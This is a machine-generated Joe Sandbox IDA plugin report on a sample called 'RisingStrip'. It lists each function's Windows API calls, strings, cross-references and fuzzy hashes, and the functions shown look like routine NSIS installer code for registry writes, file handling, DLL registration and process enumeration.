Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

GetModuleBaseNameW, xrefs: 00406494
CreateToolhelp32Snapshot, xrefs: 004065B5
Process32NextW, xrefs: 004065C8
Kernel32.DLL, xrefs: 0040659B
Process32FirstW, xrefs: 004065BD
PSAPI.DLL, xrefs: 00406464
Unknown, xrefs: 004064FC
EnumProcessModules, xrefs: 0040648A
Module32NextW, xrefs: 004065DE
EnumProcesses, xrefs: 00406482
Module32FirstW, xrefs: 004065D3

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

@%F, xrefs: 004042A7
N, xrefs: 0040426C
open, xrefs: 004042DF

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

[Rename], xrefs: 00406BC8, 00406BD7
F, xrefs: 00406AE8
%s=%s, xrefs: 00406B43
NUL, xrefs: 00406A9E

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

]s, xrefs: 00402473
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: Could not initialize OLE, xrefs: 004024F1

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: ]s$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-1165486884
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
